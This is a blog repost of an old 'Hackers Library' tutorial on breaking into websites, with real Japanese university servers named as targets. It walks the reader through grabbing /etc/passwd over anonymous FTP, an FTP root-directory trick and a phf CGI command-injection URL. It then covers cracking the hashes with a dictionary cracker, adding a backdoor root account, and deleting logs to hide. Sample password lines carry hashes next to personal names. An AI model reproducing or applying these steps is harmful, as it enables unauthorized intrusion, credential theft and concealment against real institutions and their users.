Subscribe:
    Subscribe Twitter Facebook

    Saturday, November 7, 2009

    Web Hacking An Introduction


    The Introduction on how to hack a website.

    Source: Hackers Library
    First of all you will need an ftp program such as ws_ftp. use Voyager FTP downloadable athttp://www.windows95.com/ it’s real simple and easy to use, so try it if you haven’t dealt with ftp before.  Now once you have the program find an address like http://www.shiga-pc.ac.jp you can find addresses like this by going to a search engine such as AltaVista or Google and running a search for url:ac.jp this tells the search engine to give you all the academic addresses in Japan  ex.  ac=academic jp=Japan , you can try this with any country ex.  url:dk .  But for now let’s just focus on the Japanese servers. When u have an address (I would recommend making a list of about 100 and trying them all) go to your ftp program and type in the address ex.  http://www.shiga-pc.ac.jp  note..  You will have to log in anonymously.   You should then get a list of folders on the remote system usr, pub,etc, dev, bin.  See the etc folder? open it, once opened you should see some files passwd and group, open or view the file passwd (this is where the passwords for the system are stored), you should hopefully get something
    that looks like this:

    root:RqX6dqOZsf4BI:0:1:System PRIVILEGED Account,,,:/:/bin/csh
    field:PASSWORD HERE:0:1:Field Service PRIVILEGED Account:/usr/field:/bin/csh
    operator:PASSWORD HERE:0:28:Operator PRIVILEGED Account:/opr:/opr/opser
    ris:Nologin:11:11:Remote Installation Services Account:/usr/adm/ris:/bin/sh
    daemon:*:1:1:Mr Background:/:
    sys:PASSWORD HERE:2:3:Mr Kernel:/usr/sys:
    bin:PASSWORD HERE:3:4:Mr Binary:/bin:

    uucp:Nologin:4:1:UNIX-to-UNIX Copy:/usr/spool/uucppublic:/usr/lib/uucp/uucico
    uucpa:Nologin:4:1:uucp adminstrative account:/usr/lib/uucp:
    sso:Nologin:6:7:System Security Officer:/etc/security:
    news:Nologin:8:8:USENET News System:/usr/spool/netnews:
    sccs:PASSWORD HERE:9:10:Source Code Control:/:
    ingres:PASSWORD HERE:267:74:ULTRIX/SQL Administrator:/usr/kits/sql:/bin/csh

    rlembke:n25SO.YgDxqhs:273:15:Roger Lembke,,,:/usr/email/users/rlembke:/bin/csh
    rhuston:ju.FWWOh0cUSM:274:15:Robert Huston,st 304c,386,:/usr/email/users/rhuston:/bin/csh
    jgordon:w4735loqb8F5I:275:15:James.”Tiger” Gordon:/usr/email/users/jgordon:/bin/csh
    lpeery:YIJkAzKSxkz4M:276:15:Larry Peery:/usr/email/users/lpeery:/bin/csh
    nsymes:lSzkVgKhuOWRM:277:15:Nancy Symes:/usr/email/users/nsymes:/bin/csh
    llembke:yDAq2xZgzqmms:278:15:Linda Lembke:/usr/email/users/llembke:/bin/csh
    grees:eb2pQcYI0Q5UI:279:15:Gary Rees:/usr/email/users/grees:/bin/csh
    nreece:NiwrmCHzn5p7A:281:15:Neva Reece:/usr/email/users/nreece:/bin/csh
    delliott:8Q1O1LukmfXfA:283:15:Dan Elliott:/usr/email/users/delliott:/bin/csh

    erobinet:vGufhYNuhkTZ6:284:15:Eric Robinette:/usr/email/users/erobinet:/bin/csh
    mhirsch:0AgYY2.YBLj8Y:285:15:Michael Hirsch:/usr/email/users/mhirsch:/bin/csh
    schristi:yckqD6acrG2OM:289:15:Scott Christianson:/usr/email/users/schristi:/bin/csh
    pdrummon:39MW8ROgoY.T6:294:15:R.Paul Drummond:/usr/email/users/pdrummon:/bin/csh

    dbrown:fmTUonryY2mCE:295:15:Doris Brown:/usr/email/users/dbrown:/bin/csh
    This means you’ve hit the jackpot, in this case you should get a password cracker download one at (http://www.hackersweb.com go to the hacking toolz section), I would recommend for the beginning hacker to get a password cracker such as killer cracker because it’s extremely easy to use.  Once you have downloaded killer cracker you will need a dictionary file
    (get one at 
    http://www.hackersweb.com look in the extra toolz section), dictionary files are better the bigger they are so I would recommend (Basically this is a brute-forcing software)
    getting one at around 10 MB or more.  Now the passwords from the passwd file off the server you are hacking, you will need to save them to a file and place them in the same directory as Killer Cracker, you will also need to have your dictionary file in the same directory.  Now you are ready to go, just run killer cracker and tell it the name of the Pwfile=the password
    file and the name of the word file=your dictionary file, the valid file will be the file where the output of the password cracker will be put just give it a name such as crack.txt.  Once the cracker is done cracking the password files for you goto the valid file and take a look the file should look something like this

    root:root:0:1:System PRIVILEGED Account,,,:/:/bin/csh

    (remember this is an example). This file says that the username is root
    and the password is rootif the file had been like this.
    root:dumbass:0:1:System PRIVILEGED Account,,,:/:/bin/csh
    (remember again just an example) the login or username would be root and
    the password would be dumbass, well that’s it just ftp to the site using
    the login and password.  Note if you get root type in the following once
    you have logged in:-   echo “myserver::0:0:Test User:/:/bin/csh”>>etc\passwd
    this will allow you to login to the server with 1:myserver so you
    get the admin suspicious when they see people login as root.  Hide yourself
    as much as possible, if you already have a shell then go through that first
    when loggin on, or telnet to the hacked site shell and then re-telnet to the
    hacked shell using the hacked shell, if you see what I mean, so your who
    appears as local host.  Also get some c scripts which delete your presence,
    erases you off logs etc.

    Now if you were not as lucky to get exactly the same password file as shown
    in the example above then maybe you got something like this.

    root:*:0:1:Operator:/:
    ftp:*:53:53:anonymous ftp:/pub:
    t2:*:201:201:Takaoka Tadashi:/pub:

    This means that the passwd file is shadowed, if this is the case then
    welcome to the administrators world of trying to stop hackers, this is
    where you cant really do anything.  However there is one thing to do
    sometimes in very rare cases there may be a folder on the remote system
    that can be accessed by an anonymous login called shadowed, shadow, or
    secret if this is the case the password files should be in there,
    congratulations.   If there isn’t a folder like this, and the passwd file
    is shadowed then bad luck, go to the next address on your list.

    Now that you have tried the first thing as shown above there are a couple
    of other methods you may also want to try one is FTP hacking shown below.

    Go to a dos prompt after you are connected to the internet .
    Type.
    ftp www.victim=the site address
    server will ask for a username press enter
    server will ask for a password press enter
    at the prompt type quote  user ftp
    then type
    quote cwd ~root
    then type
    quote pass ftp

    If you get in make sure you delete the log file they might look at it and
    see that you were on.  Once you get on the passwd file is in etc/passwd so
    type cd etc then type get passwd.  If you have done the above right and the
    server is old you will have root access.  By the way root is the highest
    security status you can have.

    Another good way of getting root or a shell at least is through browser
    hacking.  Again well use Japanese educational servers as our target. To do
    this you will need a browser such as Netscape or Internet Explorer, you
    will also need a telnet program, you can either download a telnet program
    at 
    http://www.windows95.com or use the one that already comes with dos.
    To access the telnet program that comes with dos go to your dos windows and
    type in telnet www.site.com  the site.com stand for the site you want to
    telnet to, it could be anything like 
    www.geidai.ac.jp or www.tulips.tsukuba.ac.jp.  You will also need a cracker program I would recommend using Killer Cracker and applying as above.

    Next thing you do is open your browser and run a search for url:ac.jp ,
    like explained above.  Again I would recommend making a big list of your
    targets.  Now when you have your targets we address type it in your browser
    and add this to it.

    http://www.tagetgoeshere.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
    or
    http://www.tagetgoeshere.com/cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd
    To all you out there who are slightly advanced, I know this is the phf
    technique and it is virtually dead, but you’ll be surprised where you can
    use this.

    This technique of finding the password file was first used in November 1996
    on the fbi.gov webpage by a few hackers. It has been patched up by a lot of
    servers, so this won’t work on something like www.nasa.gov or most of the
    www.*.com sites.  But still works on many university servers outside Europe
    and the U.S.

    O.K.  Once the url is entered you will see a number of things:-
    Error 404
    Cgi-bin/phf is not found on this server (the most common one)
    Or
    Warning
    You do not have permission to view cgi-bin/phf?/ on this server
    There are a number of other things the server might say, but the thing you
    want it to say is this:-

    Query Results
    /usr/local/bin/ph -m alias=x /bin/cat /etc/passwd
    root:2hjh34b4hj:0:1:0000-Admin(0000):/:/bin/sh
    daemon:fghfhijyjk:1:1:0000-Admin(0000):/:
    bin:fghfed7tfndgh:2:2:0000-Admin(0000):/usr/bin:/bin/csh
    sys:fdn7:3:3:0000-Admin(0000):/:
    adm:dehf6:4:4:0000-Admin(0000):/var/adm:
    wnn:dfhfnv:5:5:0000-Admin(0000):/var/adm:
    news:detdc:6:6:0000-Admin(0000):/usr/lib/news:
    lp:qwwos:71:8:0000-lp(0000):/usr/spool/lp:
    smtp:cmvof:0:0:mail daemon user:/:
    uucp:lcocbe:5:5:0000-uucp(0000):/usr/lib/uucp:
    nuucp:pelebd:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
    listen:eoend:37:4:Network Admin:/usr/net/nls:
    nobody:ccvjcvj:60001:60001:uid no b

    etc.
    This means you have hit the jackpot!!!
    If you get something similar to this but all lines have something in common
    like the following:-

    Query Results
    /usr/local/bin/ph -m alias=x /bin/cat /etc/passwd
    root:x:0:1:0000-Admin(0000):/:/bin/sh
    daemon:x:1:1:0000-Admin(0000):/:
    bin:x:2:2:0000-Admin(0000):/usr/bin:/bin/csh
    sys:x:3:3:0000-Admin(0000):/:
    adm:x:4:4:0000-Admin(0000):/var/adm:
    wnn:x:5:5:0000-Admin(0000):/var/adm:
    news:x:6:6:0000-Admin(0000):/usr/lib/news:
    lp:x:71:8:0000-lp(0000):/usr/spool/lp:
    smtp:x:0:0:mail daemon user:/:
    uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
    nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
    listen:x:37:4:Network Admin:/usr/net/nls:
    nobody:x:60001:60001:uid no b

    (notice the c) if you don’t know what this means it means the password
    file is shadowed and you cannot work out ht epasswords for a shadowed
    password file then you’re in bad luck, I would recommend trying the ftp
    hack prior to this for the best results.

    If some but not all logins have a * in them then it’s ok, it’s worth while
    getting the ones which aren’t shadowed, hey a shell is a shell!!!

    If you want to use your newly acquired shells then telnet to the site and
    put in the login and the password (remember you have to crack the password
    file first explained at the top).



    0 comments:

    Post a Comment

    Bidvertiser